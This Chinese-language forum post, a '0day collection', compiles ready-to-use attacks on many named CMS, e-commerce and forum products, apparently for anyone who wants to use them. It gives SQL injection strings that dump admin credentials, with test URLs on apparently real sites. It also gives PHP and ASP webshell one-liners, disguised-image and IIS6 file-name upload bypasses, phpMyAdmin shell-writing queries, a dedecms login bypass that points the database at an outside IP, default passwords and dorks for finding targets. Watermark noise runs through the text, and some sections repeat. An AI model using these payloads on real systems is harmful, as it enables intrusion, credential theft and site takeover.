0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本
5 y# Q9 r0 I, b3 s6 g" {/ |
- m2 ?! z# }. p! [3 u$ k直接上exploit:
% @: J* G% u/ d" ^+ Njavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) c% S7 c3 K4 Z$ x' \3 `Asprain论坛 注册用户 上传图片就可拿到webshell
9 E; H# c$ D6 I- ^& A
2 `: R4 N$ r9 `$ @Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
2.gif 为一小图片文件，一定要小，比如qq表情图片
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
% E. G( N; D  f5.q.asp;.gif
) M+ T: G, f) h7 |  Kgoogle：Powered by Asprain
" ~' v" `7 `3 T9 o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' w3 \: B; X- F8 |4 u
! F7 Q$ D+ V3 x! D) Q- g/ U5 V, MShopNum1全部系统存在上传漏洞。

4 G+ K( {( C# E. |. _首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
, t/ d; ?: Q3 F  I+ N按说明 提示登录后台。。
& K3 l- S( F: e4 I4 ]在后台功能页面->附件管理->附件列表
可以直接上传.aspx 后缀木马
: Z) w* M8 G3 ^  w, whttp://demo.shopnum1.com/upload/20110720083822500.aspx
% l3 N( J  d" u- o8 A( D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

: B% N% ]5 c% V0 d3 z9 Q2 V% r牛牛CMS中小企业网站管理系统 上传漏洞
% c4 d% k5 p# _9 ^% ~. n
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
: t1 T7 u& L( A6 G$ j% k9 r- ~; v后台:admin/login.asp
1 ?* `# p! v5 ]ewebeditor 5.5 Nday
exp:
5 b, y- @( N3 A" x/ x+ Y' {" z& E<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
2 _1 F+ ^- b+ {! ^+ Q<input?type=submit?value=upload>?
</form>
ps:先上传小马.
: Y$ B$ f! _8 w2 Z, k4 }& ninurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏
" L3 p1 G4 l: }0 t; v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

YothCMS 遍历目录漏洞
. @* u6 o1 k0 G' U
# c+ i! Z  l* i, ~  U3 w' }优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
默认后台:admin/login.asp
7 H+ U7 c. c. {9 w9 [. o/ |遍历目录:
; r6 i4 R7 q/ x0 }  q9 gewebeditor/manage/upload.asp?id=1&dir=../
: v. p" Q: V$ G  Gdata:
- Z% v  N3 u: E* A$ K( Dhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
9 b+ E: x' R* l/ i! `) M, i8 ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; y0 K% R4 w6 q: o
Net112企业建站系统 1.0
% l$ _& O3 |: s
源码简介：
% L0 Q7 \# G7 a6 oNet112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
添加管理员：
http://www.0855.tv/admin/admin.asp?action=add&level=2
: x7 S+ \. A1 l& U4 w4 G7 u' B& {其实加不加都不是很重要，后台文件都没怎么作验证。
, |6 k4 i5 [2 A: t  m- }上传路径：
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
5 H: n) A! K* Z! W" N4 T6 P8 Vhttp://www.0855.tv/inc/Upfile.asp?Stype=2
怎么利用自己研究。
遍历目录：
0 g: k" e3 c0 \& l7 A' j/ vhttp://www.0855.tv/admin/upfile.asp?path=../..
5 E! ~6 f! V' B# d7 d如：
8 l2 |4 O5 s% }0 s% Fhttp://www.0855.tv/admin/upfile.asp?path=../admin
3 L6 }" J$ T9 e5 l. e5 whttp://www.0855.tv/admin/upfile.asp?path=../data
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& A5 ^! x* |; j6 o
易和阳光购物商城通杀 上传漏洞
' Y2 P. D8 ^+ N. n! T- _$ N
* @0 o" g% \8 L' p$ a: e前提要求是IIS6.0+asp坏境。
4 D) A% _* m: N4 A" `' v0 }漏洞文件Iheeo_upfile.asp
1 q5 N- Z  R9 f* p* C9 |过滤不严.直接可以iis6.0上传
把ASP木马改成0855.asp;1.gif
: `# Z0 i& H4 ~2 [直接放到明小子上传
8 m: R9 U6 E  KGoogle搜索：inurl:product.asp?Iheeoid=
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

% }! J& J: F4 l: H, `2 v" U; ^phpmyadmin后台4种拿shell方法
% N  |2 x, ~8 |
( H) \, ^5 W5 |9 F! ?: B3 h9 m方法一：
% O+ j6 c; @4 V0 |" n% q, O- p# P) xCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
7 B) a8 C" f% o5 L8 g* ?( V% ~0 ~SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
一句话连接密码：xiaoma
' a0 v9 \+ ^+ j$ {( C1 y* v方法二：
Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;
方法三：
& l7 c3 a8 w" n! ^! t( z. [读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
* m8 O# {2 r/ e: S: lcmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
  _2 H5 E( Y! ^; y: E1 Y4 W0 q方法四：
/ t4 w; r/ t9 |/ [- [  r: Bselect load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ G4 \3 d9 c0 R9 l0 l7 Y( [
% F% o0 b, r: i, v" m传信网络独立开发网站源码0day漏洞

后台system/login.asp
! j$ {+ f) V' i/ \" f& M' G3 N* c+ f进了后台有个ewebeditor
Google 搜索inurl:product1.asp?tyc=
编辑器漏洞默认后台ubbcode/admin_login.asp
9 K% v  q  X( B$ m# a数据库ubbcode/db/ewebeditor.mdb
( t# |4 |" }  \2 {* N1 j默认账号密码yzm 111111

2 u: n) i- r+ z拿webshell方法
登陆后台点击“样式管理”-选择新增样式
) J3 X5 e3 `) r! b+ o- }8 s+ Y3 ]. g. B4 q样式名称:scriptkiddies 随便写
路径模式：选择绝对路径
图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
图片类型比如就是我们要上传的ASP木马格式
上传路径：/
' K/ y1 a# e- \0 R8 {" \图片限制：写上1000 免的上不了我们的asp木马
上传内容不要写
可以提交了
! i/ G( K% N6 @% i样式增加成功！
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
上ASP木马 回车 等到路径
8 A# J' P0 i- |% E, _
$ W+ ~8 _; b& z/ [2 P3 N0 {' z后台：system/login.asp
! N2 o# E( B8 I8 J- G4 m" a% JExp:
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
& m) Y7 o/ n' z" a测试:
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
! _, h4 s% \- f) e1 O' h--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ v1 W0 W+ a* O7 M9 \+ U
; u& N  z8 F8 B, t$ C  c* bfoosun 0day 最新注入漏洞

漏洞文件：www.xxx.com/user/SetNextOptions.asp
利用简单的方法：
暴管理员帐号：
* ]9 u4 j7 d$ H, p( e( m- Zhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
( ?+ ~% G* ~. I1 i6 c暴管理员密码：
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
0 }  L  b: E- Y# E7 y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

网站程序的版权未知！
* `& T/ e0 {0 j: T
, Z/ y7 g4 ~% v默认网站数据库：
2 L7 r; [8 Q% F. U# @6 j6 X8 Pwww.i0day.com/data/nxnews.mdb
' b  N" Z: J# y( [0 @0 t5 @ewebeditor 在线编辑器：
2 V( j" s' \4 _2 v$ r  W9 `  P编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
登录地址：ewebeditor/admin_login.asp
# w) r: g) H4 }9 i默认密码：admin  admin
; I# z  y: n3 [3 |4 n9 H登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
/ E5 t8 V8 Q) P% w, Z! [) _
' ~7 }. K- }' S- s2 @Sql注入漏洞：
7 L: y" F8 K2 `3 W' s& Y/ [. z1 Hhttp://www.i0day.com/detail.asp?id=12
exp:
* U. N8 j9 v( [0 t# S% }union select 1,admin,password,4,5,6,7,8 from admin
4 H  W7 |' a4 G" |, E( i- H爆出明文帐号/密码

上传漏洞：
; \( O; K) c" t4 d9 i后台+upfile.asp
1 Z4 I, O, u6 n/ D% Y' x! _如：
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
shell的地址：网址+后台+成功上传的马
6 o# x7 K0 m7 V9 p7 y' \google:inurl:news.asp?lanmuName=
' _8 G% [# f6 n! L------------------------------------------------------------------------------------------------------------------------------------------------------------------------

% w9 t7 v* D  N' Qdedecms最新0day利用不进后台直接拿WEBSHELL
. b7 L) \5 K8 R) l
; j& x7 n8 U2 i拿webshell的方法如下：
% i2 U2 g% H3 p" ^# g网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
' P% J% O, f" N6 [: j3 b' D前题条件，必须准备好自己的dede数据库，然后插入数据：
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

6 Q5 O8 C: V. T* |+ i3 v: s再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
1 T! S% l5 e. l4 `( R<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
; z- V/ R) N1 Y8 g4 p$ N<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
! e! t6 q: B+ I/ R2 y' ~& b<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 N  o3 |6 n/ V. i* l<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
; A' v9 X& o: |7 l</form>
<script>
function addaction()
{
! i2 u, O! Q, N/ }document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
( q- N+ q5 A( M, j0 i-----------------------------------------------------------------------------------------------------------------------------------------------
1 x2 O9 P2 o, G* E, _0 {
0 S% K+ P$ Q1 S5 ^$ X" [3 f2 udedecms织梦暴最新严重0day漏洞
bug被利用步骤如下：
, y5 I# {' O1 G! p" o6 j3 J2 ^http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 q* L; ?) v! a$ X' X2 i把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
: R( v" k+ P3 S$ U6 z" @  y-------------------------------------------------------------------------------------------------------------------------------------------
0 U* h# t  i  V' K" J9 D
' \7 D( H# V  w! n# d: T. Y多多淘宝客程序上传漏洞
+ u# t6 Y$ ?1 ]; i7 Y, T漏洞页面：
- y5 {9 y1 O2 I0 Tadmin\upload_pic.php
传送门：
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
. o1 K; B; Z( I3 u4 Y: _9 Y! W0 f* sPS:copy张图片马 直接  xxx.php 上传抓包地址！
) V$ k' t/ p% t- q------------------------------------------------------------------------------------------------------------------------------------------------------
; l5 H2 M5 c& }- f5 A9 n
8 m: j' H# W  g! E7 E无忧公司系统ASP专业版后台上传漏洞
# b, T  C: X7 y% N漏洞文件 后台上传
- y8 A' G' O# z8 `: H  jadmin/uploadPic.asp
% r5 @9 l. R. O" d: z漏洞利用 这个漏洞好像是雷池的
( d  u. A% I) _/ shttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
等到的webshell路径：
: G) a3 Q+ C3 v# X# h- \/UploadFiles/scriptkiddies.asp;_2.gif
: N2 S, F- l5 t0 T) \0 \* \---------------------------------------------------------------------------------------------------------------------------------------------------

) I0 u' f8 {; \2 s0 ?住哪酒店分销联盟系统2010
9 l( w6 X, F! t5 @! q: oSearch：
inurl:index.php?m=hotelinfo
6 u% j" \1 u6 _8 ?9 y. ?http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默认后台：index.php?m=admin/login
$ h7 J) O# `3 r' B4 |--------------------------------------------------------------------------------------------------------------------------------------------------
: h& B5 e: |' n4 r7 K0 d/ p* B) \
2 K1 V8 m# A9 z  R+ r5 Q4 G- Hinurl:info_Print.asp?ArticleID=
后台 ad_login.asp
爆管理员密码：
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------

0 e$ Q2 i% p  N% H  ]搜索框漏洞！
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
--------------------------------------------------------------------------------------------------------------------------------------------------------
) e' @1 x* N' b
6 x) j' M  n. u) d8 n关键字：
inurl:/reg_TemletSel.asp?step=2
或者
电子商务自助建站--您理想的助手
-------------------------------------------------------------------------------------------------------------------------------------------------

. D" [% P2 h% ]0 C/ k$ iiGiveTest 2.1.0注入漏洞
. w% n4 _) R0 @; F- |% J+ LVersion: <= 2.1.0
* z! |( [8 I- ~% \( t* p7 v# Homepage: http://iGiveTest.com/
谷歌关键字: “Powered by iGiveTest”
随便注册一个帐号。然后暴管理员帐号和密码
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
% S' E2 v/ R& W& h. R8 b------------------------------------------------------------------------------------------------------------------------------------------------

* E/ n5 [8 y+ E, X/ fCKXP网上书店注入漏洞
( @% D0 y7 q: p' G! q6 D工具加表:shop_admin 加字段:admin
7 J  k* O" N2 n5 Y" ]后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
! A* X: r% l- i  B6 |5 a--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" T0 C+ q( M! D' W: ]2 \2 b
# ]6 E# G: ?7 ~# V段富超个人网站系统留言本写马漏洞
# M9 W  I' E5 Y) n# h源码下载：http://www.mycodes.net/24/2149.htm
addgbook.asp 提交一句话。
连接： http://www.xxxx.tv/date/date3f.asp
google:为防批量，特略！
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

: E" f5 J2 }, @& \* o智有道专业旅游系统v1.0 注入及列目录漏洞
默认后台路径：/admin/login.asp
默认管理员：admin
默认密码：123456
0 _9 O5 ]% u( U$ V! E: I% I% WSQL EXP Tset:
" K9 ]( v0 f5 L5 }http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ewebeditor(PHP) Ver 3.8 本任意文件上传0day
2 x1 c3 R* z' f. P3 B+ Q, d& }6 MEXP：
% i# `1 O4 Q+ @9 t$ N- |) U<title>eWebeditoR3.8 for php任意文件上EXP</title>
6 p3 e+ s+ a. t! O9 v3 E<form action="" method=post enctype="multip
% ^$ R1 p! F5 r! L  B: C8 yart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
# x  d3 @5 ]' I. [file:<input type=file name="uploadfile"><br>
( s4 r3 i5 ~" K3 e3 A3 p<input type=button value=submit onclick=fsubmit()>
$ }, T7 e$ i% O6 ]# }+ W& W( X</form><br>
<script>
) `) ]  F' I$ Y& [' D; yfunction fsubmit(){
" x( ~1 f% e# X) aform = document.forms[0];
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
alert(form.action);
form.submit();
/ p$ R% k, K! w+ ?0 S: ^) t}
! _0 e. D) @% }8 c( ]</script>
注意修改里面ewebeditor的名称还有路径。
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 N  C8 j5 z6 K
1 z0 Q7 ^/ G" B( K: _" |" P提交’时提示ip被记录 防注入系统的利用
网址：http://www.xxx.com/newslist.asp?id=122′
* ?, m! B! ~$ ~8 _' e提示“你的操作已被记录!”等信息。
利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
/ h! W1 q/ {3 Y8 V6 B/ z& I7 {-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

8 W$ R- ~8 z& {( L. e2 W西部商务网站管理系统 批量拿shell-0day
+ E# w5 R& K/ R% g这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
! l2 w% S6 i. [7 M3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 _- q/ |( ?% ]7 w& \
, J: G$ p) V5 |& ^4 X4 o; [$ h; RJspRun!6.0 论坛管理后台注入漏洞
+ V" H1 L0 ~9 x7 f7 C% e
' G1 |# g3 b" e: N1 z. ^7 w( }SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
JspRun!6.0
" K8 m1 k1 [9 h% @0 \( `. d5 G* m漏洞描述:
: D2 R' z1 O' M" ]% `8 v5 cJspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
在处理后台提交的文件中ForumManageAction.java第1940行
String export = request.getParameter("export");//直接获取，没有安全过滤
1 m  m; k1 T5 x$ B, R& x; M9 sif(export!=null){
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
if(styles==null||styles.size()==0){
<*参考
" C& S8 r# k+ e) }4 F& m- Hnuanfan@gmail.com
$ B0 c- N  F! b% \# A3 a*> SEBUG安全建议:
www.jsprun.net
4 n3 i5 ^% h! M（1）安全过滤变量export
（2）在查询语句中使用占位符
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

' m$ v! L5 b' o6 g3 P乌邦图企业网站系统 cookies 注入
- f" H+ y' }1 Y! A+ M  c
! j/ K2 y- r5 L2 I7 G! e/ ?程序完整登陆后台:/admin/login.asp
默认登陆帐号:admin 密码:admin888
语句：(前面加个空格)
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
或者是16个字段：
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段。
注入点：http://www.untnt.com/shownews.asp?=88
9 w$ X* v; ~$ i0 ?$ _# Fgetshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
关键字：
* e# |. |. [3 tinurl:shownews?asp.id=
& C- w/ o4 B: E! ]+ m& K-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CKXP网上书店注入漏洞

工具加表:shop_admin 加字段:admin
后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) @: J; x+ r( L) U
YxShop易想购物商城4.7.1版本任意文件上传漏洞

1 z, P  p( ~( C+ E9 ~  X" ghttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
跳转到网站根目录上传任意文件。
如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
1 }9 e' v3 ?4 u: R6 KUpload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
5 n' z+ d! T1 z<input id="btnUpload" type="submit" value="Upload">
- K9 s; I& d; J, k</form>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

& ~) V! `7 j" m$ L9 n/ L8 s' N% HSDcms 后台拿webshell
/ m, ^/ x: f& T& K4 i* S1 a1 G
第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
6 J4 B  v3 U* O/ v; h, [1 M用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
第二种方法：
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
7 {5 k" a7 k, v) i) _4 j5 I# `第三种方法：
! R# A% P; s* U- N- `0 ^进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
9 H5 H  G' B$ L. s5 g$ X内容写入下面内容：
/====================复制下面的=========================/
( I: k  o0 u6 Z" Q% b<%@ WebHandler Language="C#" Class="Handler" %>
! I6 T6 F. I6 s/ J% t2 vusing System;
using System.Web;
1 _" B: s. }' x; j# musing System.IO;
* A+ Y" R* H! V4 u! u7 b5 B$ d& lpublic class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
) a4 ~" s5 K6 Y9 ]context.Response.ContentType = "text/plain";
/ u9 J- ]! i- OStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
# n% C; h. v2 y# P9 bfile1.Flush();
9 @2 ~9 J# L6 }7 ?# i0 u) Dfile1.Close();
8 @" M! ^% b0 X. k) o$ ?}
3 E; D5 L0 D: Ppublic bool IsReusable {
get {
7 m# t, x: p1 t  O- J( `, F' u1 Oreturn false;
2 h1 V; N! q" L7 P6 |2 `7 O0 Q}
( o- ?8 S7 R4 j( f}
7 j7 x. O( A9 p. F! g8 X2 k}
/=============================================/
访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
) ]) j" h* H' E( B-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) W0 c) L) m8 ^8 F% b, y' c
ESCMS网站管理系统0day
: j1 B. w9 p# [4 e
后台登陆验证是通过admin/check.asp实现的
. b& Y. X6 O3 h" y
首先我们打开http://target.com/admin/es_index.html
+ |" x! [( |/ [, \然后在COOKIE结尾加上
" m9 L: [( m  @9 e; ESCMS$_SP2=ES_admin=st0p;
修改,然后刷新
进后台了嘎..
+ a; y" L/ x( f( g% z0 P3 y然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL

利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
/ z2 }. r" }! Z3 J8 ?" Q5 ^9 U嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
6 |% F( I4 A+ K/ X  m3 @6 i+ {在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' R- h* Q7 R2 S$ n4 P% f2 t3 e* `! i
( @7 W2 k6 W1 r& N3 g) Y宁志网站管理系统后台无验证漏洞及修复
/ J' _9 G/ }1 ?* V
, f- b1 _0 F8 R) O7 N$ p网上搜了一下,好像没有发布.如有雷同纯粹巧合!
5 D: i  s" a- w) }: o% D0 S0 J6 ^官方网站:www.ningzhi.net
学校网站管理系统 V.2011版本
) m* I6 ^2 R" N4 Yhttp://down.chinaz.com/soft/29943.htm
+ A9 K2 |( D0 S其它版本(如:政府版等),自行下载.
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
' G' d2 O; G. R% ~3 F- blogin.asp代码如下:
; ^: L$ G: s  o<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
; a! V, u" v5 Z1 \2 vmanage.asp代码我就不帖出来了.反正也没验证.
8 M+ @+ \/ q. |& Q2 e$ {$ c/ C只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
漏洞利用:
- v0 H# d) F& H" Q1 W直接访问http://www.0855.tv/admin/manage.asp
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
/ ~4 a3 d8 {4 P6 m2 }1 U# Q2 i----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

phpmyadmin拿shell的四种方法总结及修复

方法一：
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on
方法二：
* b2 J7 S2 t" J9 h! E( z4 c! F读取文件内容：    select load_file('E:/xamp/www/s.php');
0 H4 F- D: P( `) }( `. A写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
* e1 x) {+ D1 t& k; ?cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
: U# ?" d2 A  E- U! L2 l方法三：
" R+ M3 Q7 h* D' N6 v7 ^8 ~0 yJhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
% A: A' N) ~1 {, z2 uInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
3 f. D* D2 U7 h9 [' mselect cmd from study into outfile 'E:/wamp/www/7.php';
$ e. w9 O, |5 ]% c+ cDrop TABLE IF EXISTS study;
<?php eval($_POST[cmd])?>
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
